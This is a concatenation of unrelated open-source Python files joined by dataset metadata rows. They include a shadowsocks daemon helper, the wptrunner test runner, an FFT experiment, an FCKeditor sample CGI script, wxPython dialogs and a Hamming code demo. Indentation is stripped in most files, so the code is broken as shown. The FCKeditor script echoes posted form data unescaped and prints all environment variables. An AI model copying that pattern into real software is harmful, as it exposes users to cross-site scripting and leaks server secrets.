# License for the specific language governing permissions and limitations
# under the License.
from __future__ import absolute_import, division, print_function, \
with_statement
import os
import sys
import logging
import signal
import time
from shadowsocks import common, shell
# this module is ported from ShadowVPN daemon.c
def daemon_exec(config):
if 'daemon' in config:
if os.name != 'posix':
raise Exception('daemon mode is only supported on Unix')
command = config['daemon']
if not command:
command = 'start'
pid_file = config['pid-file']
log_file = config['log-file']
if command == 'start':
daemon_start(pid_file, log_file)
elif command == 'stop':
daemon_stop(pid_file)
# always exit after daemon_stop
sys.exit(0)
elif command == 'restart':
daemon_stop(pid_file)
daemon_start(pid_file, log_file)
else:
raise Exception('unsupported daemon command %s' % command)
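# Shape of the config dict consumed above (values are illustrative only):
#
#   config = {
#       'daemon': 'start',                        # or 'stop' / 'restart'
#       'pid-file': '/var/run/shadowsocks.pid',
#       'log-file': '/var/log/shadowsocks.log',
#   }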
def write_pid_file(pid_file, pid):
import fcntl
import stat
try:
fd = os.open(pid_file, os.O_RDWR | os.O_CREAT,
stat.S_IRUSR | stat.S_IWUSR)
except OSError as e:
shell.print_exception(e)
return -1
flags = fcntl.fcntl(fd, fcntl.F_GETFD)
assert flags != -1
flags |= fcntl.FD_CLOEXEC
r = fcntl.fcntl(fd, fcntl.F_SETFD, flags)
assert r != -1
# There is no platform independent way to implement fcntl(fd, F_SETLK, &fl)
# via fcntl.fcntl. So use lockf instead
try:
fcntl.lockf(fd, fcntl.LOCK_EX | fcntl.LOCK_NB, 0, 0, os.SEEK_SET)
except IOError:
r = os.read(fd, 32)
if r:
logging.error('already started at pid %s' % common.to_str(r))
else:
logging.error('already started')
os.close(fd)
return -1
os.ftruncate(fd, 0)
os.write(fd, common.to_bytes(str(pid)))
return 0
def freopen(f, mode, stream):
oldf = open(f, mode)
oldfd = oldf.fileno()
newfd = stream.fileno()
os.close(newfd)
os.dup2(oldfd, newfd)
def daemon_start(pid_file, log_file):
def handle_exit(signum, _):
if signum == signal.SIGTERM:
sys.exit(0)
sys.exit(1)
signal.signal(signal.SIGINT, handle_exit)
signal.signal(signal.SIGTERM, handle_exit)
# fork only once because we are sure parent will exit
pid = os.fork()
assert pid != -1
if pid > 0:
# parent waits for its child
time.sleep(5)
sys.exit(0)
# child signals its parent to exit
ppid = os.getppid()
pid = os.getpid()
if write_pid_file(pid_file, pid) != 0:
os.kill(ppid, signal.SIGINT)
sys.exit(1)
os.setsid()
signal.signal(signal.SIGHUP, signal.SIG_IGN)
print('started')
os.kill(ppid, signal.SIGTERM)
sys.stdin.close()
try:
freopen(log_file, 'a', sys.stdout)
freopen(log_file, 'a', sys.stderr)
except IOError as e:
shell.print_exception(e)
sys.exit(1)
def daemon_stop(pid_file):
import errno
try:
with open(pid_file) as f:
buf = f.read()
pid = common.to_str(buf)
if not buf:
logging.error('not running')
except IOError as e:
shell.print_exception(e)
if e.errno == errno.ENOENT:
# always exit 0 if we are sure daemon is not running
logging.error('not running')
return
sys.exit(1)
pid = int(pid)
if pid > 0:
try:
os.kill(pid, signal.SIGTERM)
except OSError as e:
if e.errno == errno.ESRCH:
logging.error('not running')
# always exit 0 if we are sure daemon is not running
return
shell.print_exception(e)
sys.exit(1)
else:
logging.error('pid is not positive: %d', pid)
# sleep for maximum 10s
for i in range(0, 200):
try:
# query for the pid
os.kill(pid, 0)
except OSError as e:
if e.errno == errno.ESRCH:
break
time.sleep(0.05)
else:
logging.error('timed out when stopping pid %d', pid)
sys.exit(1)
print('stopped')
os.unlink(pid_file)
def set_user(username):
if username is None:
return
import pwd
import grp
try:
pwrec = pwd.getpwnam(username)
except KeyError:
logging.error('user not found: %s' % username)
raise
user = pwrec[0]
uid = pwrec[2]
gid = pwrec[3]
cur_uid = os.getuid()
if uid == cur_uid:
return
if cur_uid != 0:
logging.error('can not set user as nonroot user')
# will raise later
# inspired by supervisor
if hasattr(os, 'setgroups'):
groups = [grprec[2] for grprec in grp.getgrall() if user in grprec[3]]
groups.insert(0, gid)
os.setgroups(groups)
os.setgid(gid)
os.setuid(uid)
| apache-2.0 | -997,238,483,029,674,400 | 25.932692 | 79 | 0.582114 | false |
simartin/servo | tests/wpt/web-platform-tests/tools/wptrunner/wptrunner/wptrunner.py | 1 | 18782 | from __future__ import print_function, unicode_literals
import json
import os
import sys
from six import iteritems, itervalues
import wptserve
from wptserve import sslutils
from . import environment as env
from . import instruments
from . import mpcontext
from . import products
from . import testloader
from . import wptcommandline
from . import wptlogging
from . import wpttest
from mozlog import capture, handlers
from .font import FontInstaller
from .testrunner import ManagerGroup
from .browsers.base import NullBrowser
here = os.path.dirname(__file__)
logger = None
"""Runner for web-platform-tests
The runner has several design goals:
* Tests should run with no modification from upstream.
* Tests should be regarded as "untrusted" so that errors, timeouts and even
crashes in the tests can be handled without failing the entire test run.
* For performance, tests can be run in multiple browsers in parallel.
The upstream repository has the facility for creating a test manifest in JSON
format. This manifest is used directly to determine which tests exist. Local
metadata files are used to store the expected test results.
"""
def setup_logging(*args, **kwargs):
global logger
logger = wptlogging.setup(*args, **kwargs)
return logger
def get_loader(test_paths, product, debug=None, run_info_extras=None, chunker_kwargs=None,
test_groups=None, **kwargs):
if run_info_extras is None:
run_info_extras = {}
run_info = wpttest.get_run_info(kwargs["run_info"], product,
browser_version=kwargs.get("browser_version"),
browser_channel=kwargs.get("browser_channel"),
verify=kwargs.get("verify"),
debug=debug,
extras=run_info_extras,
enable_webrender=kwargs.get("enable_webrender"))
test_manifests = testloader.ManifestLoader(test_paths, force_manifest_update=kwargs["manifest_update"],
manifest_download=kwargs["manifest_download"]).load()
manifest_filters = []
include = kwargs["include"]
if test_groups:
include = testloader.update_include_for_groups(test_groups, include)
if include or kwargs["exclude"] or kwargs["include_manifest"] or kwargs["default_exclude"]:
manifest_filters.append(testloader.TestFilter(include=include,
exclude=kwargs["exclude"],
manifest_path=kwargs["include_manifest"],
test_manifests=test_manifests,
explicit=kwargs["default_exclude"]))
ssl_enabled = sslutils.get_cls(kwargs["ssl_type"]).ssl_enabled
h2_enabled = wptserve.utils.http2_compatible()
test_loader = testloader.TestLoader(test_manifests,
kwargs["test_types"],
run_info,
manifest_filters=manifest_filters,
chunk_type=kwargs["chunk_type"],
total_chunks=kwargs["total_chunks"],
chunk_number=kwargs["this_chunk"],
include_https=ssl_enabled,
include_h2=h2_enabled,
include_quic=kwargs["enable_quic"],
skip_timeout=kwargs["skip_timeout"],
skip_implementation_status=kwargs["skip_implementation_status"],
chunker_kwargs=chunker_kwargs)
return run_info, test_loader
def list_test_groups(test_paths, product, **kwargs):
env.do_delayed_imports(logger, test_paths)
run_info_extras = products.load_product(kwargs["config"], product)[-1](**kwargs)
run_info, test_loader = get_loader(test_paths, product,
run_info_extras=run_info_extras, **kwargs)
for item in sorted(test_loader.groups(kwargs["test_types"])):
print(item)
def list_disabled(test_paths, product, **kwargs):
env.do_delayed_imports(logger, test_paths)
rv = []
run_info_extras = products.load_product(kwargs["config"], product)[-1](**kwargs)
run_info, test_loader = get_loader(test_paths, product,
run_info_extras=run_info_extras, **kwargs)
for test_type, tests in iteritems(test_loader.disabled_tests):
for test in tests:
rv.append({"test": test.id, "reason": test.disabled()})
print(json.dumps(rv, indent=2))
def list_tests(test_paths, product, **kwargs):
env.do_delayed_imports(logger, test_paths)
run_info_extras = products.load_product(kwargs["config"], product)[-1](**kwargs)
run_info, test_loader = get_loader(test_paths, product,
run_info_extras=run_info_extras, **kwargs)
for test in test_loader.test_ids:
print(test)
def get_pause_after_test(test_loader, **kwargs):
if kwargs["pause_after_test"] is None:
if kwargs["repeat_until_unexpected"]:
return False
if kwargs["headless"]:
return False
if kwargs["debug_test"]:
return True
tests = test_loader.tests
is_single_testharness = (sum(len(item) for item in itervalues(tests)) == 1 and
len(tests.get("testharness", [])) == 1)
if kwargs["repeat"] == 1 and kwargs["rerun"] == 1 and is_single_testharness:
return True
return False
return kwargs["pause_after_test"]
def run_tests(config, test_paths, product, **kwargs):
"""Set up the test environment, load the list of tests to be executed, and
invoke the remainder of the code to execute tests"""
mp = mpcontext.get_context()
if kwargs["instrument_to_file"] is None:
recorder = instruments.NullInstrument()
else:
recorder = instruments.Instrument(kwargs["instrument_to_file"])
with recorder as recording, capture.CaptureIO(logger,
not kwargs["no_capture_stdio"],
mp_context=mp):
recording.set(["startup"])
env.do_delayed_imports(logger, test_paths)
product = products.load_product(config, product, load_cls=True)
env_extras = product.get_env_extras(**kwargs)
product.check_args(**kwargs)
if kwargs["install_fonts"]:
env_extras.append(FontInstaller(
logger,
font_dir=kwargs["font_dir"],
ahem=os.path.join(test_paths["/"]["tests_path"], "fonts/Ahem.ttf")
))
recording.set(["startup", "load_tests"])
test_groups = (testloader.TestGroupsFile(logger, kwargs["test_groups_file"])
if kwargs["test_groups_file"] else None)
(test_source_cls,
test_source_kwargs,
chunker_kwargs) = testloader.get_test_src(logger=logger,
test_groups=test_groups,
**kwargs)
run_info, test_loader = get_loader(test_paths,
product.name,
run_info_extras=product.run_info_extras(**kwargs),
chunker_kwargs=chunker_kwargs,
test_groups=test_groups,
**kwargs)
logger.info("Using %i client processes" % kwargs["processes"])
skipped_tests = 0
test_total = 0
unexpected_total = 0
if len(test_loader.test_ids) == 0 and kwargs["test_list"]:
logger.critical("Unable to find any tests at the path(s):")
for path in kwargs["test_list"]:
logger.critical(" %s" % path)
logger.critical("Please check spelling and make sure there are tests in the specified path(s).")
return False
kwargs["pause_after_test"] = get_pause_after_test(test_loader, **kwargs)
ssl_config = {"type": kwargs["ssl_type"],
"openssl": {"openssl_binary": kwargs["openssl_binary"]},
"pregenerated": {"host_key_path": kwargs["host_key_path"],
"host_cert_path": kwargs["host_cert_path"],
"ca_cert_path": kwargs["ca_cert_path"]}}
testharness_timeout_multipler = product.get_timeout_multiplier("testharness",
run_info,
**kwargs)
mojojs_path = kwargs["mojojs_path"] if kwargs["enable_mojojs"] else None
recording.set(["startup", "start_environment"])
with env.TestEnvironment(test_paths,
testharness_timeout_multipler,
kwargs["pause_after_test"],
kwargs["debug_test"],
kwargs["debug_info"],
product.env_options,
ssl_config,
env_extras,
kwargs["enable_quic"],
mojojs_path) as test_environment:
recording.set(["startup", "ensure_environment"])
try:
test_environment.ensure_started()
except env.TestEnvironmentError as e:
logger.critical("Error starting test environment: %s" % e.message)
raise
recording.set(["startup"])
repeat = kwargs["repeat"]
repeat_count = 0
repeat_until_unexpected = kwargs["repeat_until_unexpected"]
while repeat_count < repeat or repeat_until_unexpected:
repeat_count += 1
if repeat_until_unexpected:
logger.info("Repetition %i" % (repeat_count))
elif repeat > 1:
logger.info("Repetition %i / %i" % (repeat_count, repeat))
test_count = 0
unexpected_count = 0
tests = []
for test_type in test_loader.test_types:
tests.extend(test_loader.tests[test_type])
try:
test_groups = test_source_cls.tests_by_group(tests, **test_source_kwargs)
except Exception:
logger.critical("Loading tests failed")
return False
logger.suite_start(test_groups,
name='web-platform-test',
run_info=run_info,
extra={"run_by_dir": kwargs["run_by_dir"]})
for test_type in kwargs["test_types"]:
logger.info("Running %s tests" % test_type)
# WebDriver tests may create and destroy multiple browser
# processes as part of their expected behavior. These
# processes are managed by a WebDriver server binary. This
# obviates the need for wptrunner to provide a browser, so
# the NullBrowser is used in place of the "target" browser
if test_type == "wdspec":
browser_cls = NullBrowser
else:
browser_cls = product.browser_cls
browser_kwargs = product.get_browser_kwargs(logger,
test_type,
run_info,
config=test_environment.config,
num_test_groups=len(test_groups),
**kwargs)
executor_cls = product.executor_classes.get(test_type)
executor_kwargs = product.get_executor_kwargs(logger,
test_type,
test_environment.config,
test_environment.cache_manager,
run_info,
**kwargs)
if executor_cls is None:
logger.error("Unsupported test type %s for product %s" %
(test_type, product.name))
continue
for test in test_loader.disabled_tests[test_type]:
logger.test_start(test.id)
logger.test_end(test.id, status="SKIP")
skipped_tests += 1
if test_type == "testharness":
run_tests = {"testharness": []}
for test in test_loader.tests["testharness"]:
if ((test.testdriver and not executor_cls.supports_testdriver) or
(test.jsshell and not executor_cls.supports_jsshell)):
logger.test_start(test.id)
logger.test_end(test.id, status="SKIP")
skipped_tests += 1
else:
run_tests["testharness"].append(test)
else:
run_tests = test_loader.tests
recording.pause()
with ManagerGroup("web-platform-tests",
kwargs["processes"],
test_source_cls,
test_source_kwargs,
browser_cls,
browser_kwargs,
executor_cls,
executor_kwargs,
kwargs["rerun"],
kwargs["pause_after_test"],
kwargs["pause_on_unexpected"],
kwargs["restart_on_unexpected"],
kwargs["debug_info"],
not kwargs["no_capture_stdio"],
recording=recording) as manager_group:
try:
manager_group.run(test_type, run_tests)
except KeyboardInterrupt:
logger.critical("Main thread got signal")
manager_group.stop()
raise
test_count += manager_group.test_count()
unexpected_count += manager_group.unexpected_count()
recording.set(["after-end"])
test_total += test_count
unexpected_total += unexpected_count
logger.info("Got %i unexpected results" % unexpected_count)
logger.suite_end()
if repeat_until_unexpected and unexpected_total > 0:
break
if repeat_count == 1 and len(test_loader.test_ids) == skipped_tests:
break
if test_total == 0:
if skipped_tests > 0:
logger.warning("All requested tests were skipped")
else:
if kwargs["default_exclude"]:
logger.info("No tests ran")
return True
else:
logger.critical("No tests ran")
return False
if unexpected_total and not kwargs["fail_on_unexpected"]:
logger.info("Tolerating %s unexpected results" % unexpected_total)
return True
return unexpected_total == 0
def check_stability(**kwargs):
from . import stability
if kwargs["stability"]:
logger.warning("--stability is deprecated; please use --verify instead!")
kwargs['verify_max_time'] = None
kwargs['verify_chaos_mode'] = False
kwargs['verify_repeat_loop'] = 0
kwargs['verify_repeat_restart'] = 10 if kwargs['repeat'] == 1 else kwargs['repeat']
kwargs['verify_output_results'] = True
return stability.check_stability(logger,
max_time=kwargs['verify_max_time'],
chaos_mode=kwargs['verify_chaos_mode'],
repeat_loop=kwargs['verify_repeat_loop'],
repeat_restart=kwargs['verify_repeat_restart'],
output_results=kwargs['verify_output_results'],
**kwargs)
def start(**kwargs):
assert logger is not None
logged_critical = wptlogging.LoggedAboveLevelHandler("CRITICAL")
handler = handlers.LogLevelFilter(logged_critical, "CRITICAL")
logger.add_handler(handler)
rv = False
try:
if kwargs["list_test_groups"]:
list_test_groups(**kwargs)
elif kwargs["list_disabled"]:
list_disabled(**kwargs)
elif kwargs["list_tests"]:
list_tests(**kwargs)
elif kwargs["verify"] or kwargs["stability"]:
rv = check_stability(**kwargs) or logged_critical.has_log
else:
rv = not run_tests(**kwargs) or logged_critical.has_log
finally:
logger.remove_handler(handler)
return rv
def main():
"""Main entry point when calling from the command line"""
kwargs = wptcommandline.parse_args()
try:
if kwargs["prefs_root"] is None:
kwargs["prefs_root"] = os.path.abspath(os.path.join(here, "prefs"))
setup_logging(kwargs, {"raw": sys.stdout})
return start(**kwargs)
except Exception:
if kwargs["pdb"]:
import pdb
import traceback
print(traceback.format_exc())
pdb.post_mortem()
else:
raise
| mpl-2.0 | 9,151,762,934,626,529,000 | 41.979405 | 108 | 0.496007 | false |
boddmg/dsp-playground | experiment.py | 1 | 2717 | from matplotlib import pyplot as plt
import numpy as np
import math
import pickle
from scipy import signal
from numpy.fft import rfft, irfft
from numpy import argmax, sqrt, mean, absolute, arange, log10
from scipy.signal import blackmanharris
import thdn
def single_frequency_filter(input_signal):
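    # Keep only the strongest positive-frequency bin: FFT the signal, zero the
    # DC term, locate the peak in the first half of the spectrum, zero every
    # other bin, and inverse-FFT back to the time domain.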
y_f_all = np.fft.fft(input_signal)
y_f_all[:1] = np.array([0] *1)
    y_f_half = y_f_all[:len(y_f_all) // 2]  # integer division so the slice index stays an int on Python 3
y_f_abs = np.abs(y_f_half)
y_f_max = max(y_f_abs)
y_f_max_index = np.where(y_f_abs == y_f_max)[0][0]
print(y_f_max_index)
y_f_all[:y_f_max_index] = [0] * (y_f_max_index)
y_f_all[y_f_max_index+1:] = [0] * (len(y_f_all)-y_f_max_index-1)
y_filtered = np.fft.ifft(y_f_all)
return y_filtered
FS = 204.8
BASE_FREQUENCY = 50.0
FILTER_SAMPLE_PURE = int(2*1/BASE_FREQUENCY * FS) # 2T
FILTER_SAMPLE_ALL = 2048
DF = FS/FILTER_SAMPLE_ALL
print(DF)
filter_buffer = []
def single_filter(x):
return x
def main():
import json
# get data
data = json.load(open("data.txt", "r"))
# y = np.concatenate((np.load("data.pkl")[:256], np.array([0] * (600 - 256))))
# y = np.concatenate((np.load("data.pkl")[:], [0]*6000))
y = np.array(data["Y"])
# y = signal.resample(y, 5000)
# fs = 5000.0 * (10000/200)
fs = 1 / data["dt"]
print("fs:\t", fs)
time = len(y)/fs # in seconds
x = np.arange(0, time, 1/fs)
# x = x[:-1]
# for i in meta_data:
# print(i, meta_data[i])
print("time",time)
end = 40
f = x[:end]
f = f * fs / time
# Add the noise
# y = y.clip(-10, 7)
# y += (np.sin(x * 5) * 2).clip (-0.3, 0.8)
# y += np.random.uniform(size=len(y))
plt.subplot(231)
plt.plot(x, y, 'r')
plt.subplot(232)
y_filtered = y.tolist()
y_list = y.tolist()
for i in range(len(y_list)):
y_filtered[i] = single_filter(y_list[i])
y_filtered = np.array(y_filtered)
# y_filtered = single_frequency_filter(y)*10
# filter_function = np.array(([0] * 6 + [1] + [0] * (600 - 7)))
# filter_function = np.fft.ifft(filter_function)
# y_filtered = np.fft.ifft(y_f * filter_function)
# y_filtered = np.convolve(y_filtered, filter_function, mode='same')
# y_filtered = np.sin(x*np.pi*2* )*10
plt.plot(x, y_filtered, "b")
plt.subplot(233)
plt.plot(x[:end], y[:end], "r", x[:end], y_filtered[:end], "b")
plt.subplot(234)
y = np.abs(np.fft.fft(y))
y = y[:end]
plt.plot(f, y)
plt.subplot(235)
y_filtered = np.abs(np.fft.fft(y_filtered))
y_filtered = y_filtered[:end]
plt.plot(f, y_filtered)
plt.subplot(236)
plt.plot(f, y, 'r', f, y_filtered, 'b')
plt.show()
if __name__ == '__main__':
main()
| mit | 7,088,321,069,531,969,000 | 24.87619 | 82 | 0.57085 | false |
sidzan/netforce | netforce_general/netforce_general/set_module_version.py | 2 | 1178 | # Copyright (c) 2012-2015 Netforce Co. Ltd.
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT.
# IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM,
# DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR
# OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE
# OR OTHER DEALINGS IN THE SOFTWARE.
from netforce import set_module_version
set_module_version("3.1.0",115)
| mit | -5,861,002,526,525,387,000 | 50.217391 | 80 | 0.775042 | false |
farra/apachecon-consite | public/javascripts/fckeditor/_samples/py/sampleposteddata.py | 1 | 2067 | #!/usr/bin/env python
"""
FCKeditor - The text editor for Internet - http://www.fckeditor.net
Copyright (C) 2003-2007 Frederico Caldeira Knabben
== BEGIN LICENSE ==
Licensed under the terms of any of the following licenses at your
choice:
- GNU General Public License Version 2 or later (the "GPL")
http://www.gnu.org/licenses/gpl.html
- GNU Lesser General Public License Version 2.1 or later (the "LGPL")
http://www.gnu.org/licenses/lgpl.html
- Mozilla Public License Version 1.1 or later (the "MPL")
http://www.mozilla.org/MPL/MPL-1.1.html
== END LICENSE ==
This page lists the data posted by a form.
"""
import cgi
import os
# Tell the browser to render html
print "Content-Type: text/html"
print ""
try:
# Create a cgi object
form = cgi.FieldStorage()
except Exception, e:
print e
# Document header
print """<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html>
<head>
<title>FCKeditor - Samples - Posted Data</title>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<meta name="robots" content="noindex, nofollow">
<link href="../sample.css" rel="stylesheet" type="text/css" />
</head>
<body>
"""
# This is the real work
print """
<h1>FCKeditor - Samples - Posted Data</h1>
This page lists all data posted by the form.
<hr>
<table width="100%" border="1" cellspacing="0" bordercolor="#999999">
<tr style="FONT-WEIGHT: bold; COLOR: #dddddd; BACKGROUND-COLOR: #999999">
<td nowrap>Field Name </td>
<td>Value</td>
</tr>
"""
for key in form.keys():
try:
value = form[key].value
print """
<tr>
<td valign="top" nowrap><b>%s</b></td>
<td width="100%%" style="white-space:pre">%s</td>
</tr>
""" % (key, value)
except Exception, e:
print e
print "</table>"
# For testing your environments
print "<hr>"
for key in os.environ.keys():
print "%s: %s<br>" % (key, os.environ.get(key, ""))
print "<hr>"
# Document footer
print """
</body>
</html>
"""
| mit | -7,844,805,213,854,063,000 | 22.317647 | 76 | 0.630382 | false |
Akson/RemoteConsolePlus3 | RemoteConsolePlus3/RCP3/Backends/Sources/ZMQ/Tools/UI.py | 1 | 5885 | #Created by Dmytro Konobrytskyi, 2013 (github.com/Akson)
import wx
from RCP3.Backends.Sources.ZMQ.Tools.RoutersListProvider import GetAvailableRoutersList
class ServerSelectionDialog(wx.Dialog):
def __init__(self, currentServerAddress = None):
super(ServerSelectionDialog, self).__init__(parent=None, size=(270, 260))
self._originalServerAddress = currentServerAddress
self.serverAddress = currentServerAddress
self.availableServersList = GetAvailableRoutersList()
self.currentlySelectedIdx = -1
self.InitUI()
self.SetTitle("Select router address")
def InitUI(self):
vbox = wx.BoxSizer(wx.VERTICAL)
hbox = wx.BoxSizer(wx.HORIZONTAL)
hbox.Add(wx.StaticText(self, label='Router address:'), flag=wx.ALIGN_CENTER_VERTICAL)
self.addressTextCtrl = wx.TextCtrl(self)
self.addressTextCtrl.SetValue(self.serverAddress if self.serverAddress else "")
hbox.Add(self.addressTextCtrl, proportion=1, flag=wx.ALIGN_CENTER_VERTICAL|wx.LEFT|wx.EXPAND, border=5)
vbox.Add(hbox, flag=wx.ALL|wx.EXPAND, border=5)
hbox = wx.BoxSizer(wx.HORIZONTAL)
self.listBox = wx.ListBox(self, wx.NewId(), wx.DefaultPosition, (-1, 150), self.availableServersList, wx.LB_SINGLE)
hbox.Add(self.listBox, proportion=1, flag=wx.EXPAND)
vbox.Add(hbox, flag=wx.ALL|wx.EXPAND, border=5)
hbox = wx.BoxSizer(wx.HORIZONTAL)
okButton = wx.Button(self, label='Ok')
closeButton = wx.Button(self, label='Close')
refreshButton = wx.Button(self, label='Refresh list')
hbox.Add(okButton)
hbox.Add(closeButton, flag=wx.LEFT, border=5)
hbox.Add(refreshButton, flag=wx.LEFT, border=10)
vbox.Add(hbox, flag=wx.ALIGN_CENTER|wx.TOP|wx.BOTTOM, border=5)
self.SetSizer(vbox)
okButton.Bind(wx.EVT_BUTTON, self.SaveNewAddresAndClose)
closeButton.Bind(wx.EVT_BUTTON, self.RestoreOriginalAndClose)
refreshButton.Bind(wx.EVT_BUTTON, self.RefreshRoutersList)
self.Bind(wx.EVT_CLOSE, self.RestoreOriginalAndClose)
self.listBox.Bind(wx.EVT_LISTBOX, self.OnSelect)
self.addressTextCtrl.Bind(wx.EVT_TEXT, self.OnText)
def OnText(self, event):
        idx = self.currentlySelectedIdx
        # guard against an empty list or no current selection (idx == -1)
        if idx < 0 or idx >= len(self.availableServersList) or \
                self.availableServersList[idx] != self.addressTextCtrl.GetValue():
            self.currentlySelectedIdx = -1
            self.listBox.Select(self.currentlySelectedIdx)
def OnSelect(self, event):
self.currentlySelectedIdx = event.GetSelection()
self.addressTextCtrl.SetValue(self.availableServersList[event.GetSelection()])
self.listBox.Select(self.currentlySelectedIdx)
def RefreshRoutersList(self, e=None):
self.availableServersList = GetAvailableRoutersList()
self.listBox.Set(self.availableServersList)
self.listBox.Select(self.currentlySelectedIdx)
def SaveNewAddresAndClose(self, e):
self.serverAddress = self.addressTextCtrl.GetValue()
self.Destroy()
def RestoreOriginalAndClose(self, e):
self.serverAddress = self._originalServerAddress
self.Destroy()
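# Rough usage sketch (assumes a running wx.App; the address below is made up):
#   dlg = ServerSelectionDialog("tcp://192.168.0.10:5556")
#   dlg.ShowModal()
#   new_address = dlg.serverAddress   # the new selection, or the original on cancel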
class StreamsSelectionDialog(wx.Dialog):
def __init__(self, currentServerAddress, currentStreams = []):
super(StreamsSelectionDialog, self).__init__(parent=None, size=(670, 360))
self.serverAddress = currentServerAddress
self._originalStreams = currentStreams
self.streamsList = currentStreams
self.currentlySelectedIdx = -1
self.InitUI()
self.SetTitle("Select listening streams for "+self.serverAddress)
def InitUI(self):
vbox = wx.BoxSizer(wx.VERTICAL)
hbox = wx.BoxSizer(wx.HORIZONTAL)
hbox.Add(wx.StaticText(self, label='Stream name:'), flag=wx.ALIGN_CENTER_VERTICAL)
self.addressTextCtrl = wx.TextCtrl(self)
self.addressTextCtrl.SetValue("")
hbox.Add(self.addressTextCtrl, proportion=1, flag=wx.ALIGN_CENTER_VERTICAL|wx.LEFT|wx.EXPAND, border=5)
addButton = wx.Button(self, label='Add')
hbox.Add(addButton, flag=wx.ALIGN_CENTER_VERTICAL|wx.LEFT|wx.EXPAND, border=5)
vbox.Add(hbox, flag=wx.ALL|wx.EXPAND, border=5)
hbox = wx.BoxSizer(wx.HORIZONTAL)
self.listBox = wx.ListBox(self, wx.NewId(), wx.DefaultPosition, (-1, 250), self.streamsList, wx.LB_SINGLE)
hbox.Add(self.listBox, proportion=1, flag=wx.EXPAND)
vbox.Add(hbox, flag=wx.ALL|wx.EXPAND, border=5)
hbox = wx.BoxSizer(wx.HORIZONTAL)
okButton = wx.Button(self, label='Ok')
closeButton = wx.Button(self, label='Close')
hbox.Add(okButton)
hbox.Add(closeButton, flag=wx.LEFT, border=5)
vbox.Add(hbox, flag=wx.ALIGN_CENTER|wx.TOP|wx.BOTTOM, border=5)
self.SetSizer(vbox)
okButton.Bind(wx.EVT_BUTTON, self.SaveAndClose)
closeButton.Bind(wx.EVT_BUTTON, self.RestoreOriginalAndClose)
addButton.Bind(wx.EVT_BUTTON, self.OnAddButton)
self.Bind(wx.EVT_CLOSE, self.RestoreOriginalAndClose)
self.listBox.Bind(wx.EVT_KEY_DOWN, self.OnKeyPress)
self.listBox.Bind(wx.EVT_LISTBOX, self.OnSelect)
def OnSelect(self, event):
self.currentlySelectedIdx = event.GetSelection()
def OnAddButton(self, e):
self.listBox.Append(self.addressTextCtrl.GetValue())
pass
def SaveAndClose(self, e):
self.streamsList = self.listBox.GetStrings()
self.Destroy()
def RestoreOriginalAndClose(self, e):
self.streamsList = self._originalStreams
self.Destroy()
def OnKeyPress(self, evt):
if evt.GetKeyCode() == wx.WXK_DELETE:
if self.currentlySelectedIdx!=-1:
self.listBox.Delete(self.currentlySelectedIdx) | lgpl-3.0 | -610,739,986,345,620,500 | 42.6 | 123 | 0.668479 | false |
imrandomizer/Algorithm-Implementations | Hamming_Code/Python/AlexMathew/HammingCode.py | 27 | 1830 | """
AUTHOR : Alex Mathew
EMAIL : [email protected]
There is a lot I can do to improve this implementation.
"""
"""For a given binary word, print out its corresponding Hamming Coded word"""
import math
def FindKeyBits(n):
keyBits=[]
pad = int(math.ceil(math.log(n)/math.log(2)))
for i in xrange(1, n+1):
b = "{0:b}".format(i)
b=b.zfill(pad)
keyBits.append(b)
return keyBits
def IsPowerOf2(x):
return ((x&(x-1))==0)
def XOR(a, b):
return str(int(a)^int(b))
def FindParityCount(m):
r = math.ceil((math.log(m)/math.log(2))+1)
return int(r)
def CalculateParity(keyBits, data, parityTrack):
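    # Walk every non-parity position (index not a power of two); if its binary
    # index has the current parity bit set, XOR in the matching data bit.  Data
    # bits are read from the end of the input string as data[pbCount - position],
    # where pbCount counts the power-of-two (parity) positions seen so far.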
parity = '0'
pbCount = 0
for elem in keyBits:
if not IsPowerOf2(int(elem,2)):
if elem[-parityTrack]=='1':
parity = XOR(parity, data[pbCount-int(elem,2)])
else:
pbCount+=1
return parity
def ComputeHamming(data):
dataLen = len(data)
parityCount = FindParityCount(dataLen)
hammingLen = dataLen + parityCount
keyBits = FindKeyBits(hammingLen)
hammingCode = []
dataTrack = -1
parityTrack = 1
for i in xrange(1, hammingLen+1):
if IsPowerOf2(i):
parity = CalculateParity(keyBits, data, parityTrack)
hammingCode.append(parity)
parityTrack+=1
else:
hammingCode.append(data[dataTrack])
dataTrack-=1
hammingCode.reverse()
for i in hammingCode:
print i,
def main():
    print 'The inputs are passed into the ComputeHamming() function as a string \n'
print '\nSample runs - '
print '\n\nINPUT : 1101'
print 'OUTPUT : '
ComputeHamming('1101')
print '\n\nINPUT : 11011101'
print 'OUTPUT : '
ComputeHamming('11011101')
print '\n\n'
data = raw_input("Enter the word to be encoded : ")
print '\nThe Hamming encoded word for', data, 'is : ',
ComputeHamming(data)
if __name__ == '__main__':
main() | mit | 3,182,387,992,965,928,400 | 22.177215 | 78 | 0.650273 | false |
nachandr/cfme_tests | cfme/tests/perf/workloads/test_idle.py | 2 | 2619 | """Runs Idle Workload by resetting appliance and enabling specific roles with no providers."""
import time
import pytest
from cfme.utils.conf import cfme_performance
from cfme.utils.grafana import get_scenario_dashboard_urls
from cfme.utils.log import logger
from cfme.utils.smem_memory_monitor import add_workload_quantifiers
from cfme.utils.smem_memory_monitor import SmemMemoryMonitor
from cfme.utils.workloads import get_idle_scenarios
def pytest_generate_tests(metafunc):
argvalues = [[scenario] for scenario in get_idle_scenarios()]
idlist = [scenario['name'] for scenario in get_idle_scenarios()]
metafunc.parametrize(['scenario'], argvalues, ids=idlist)
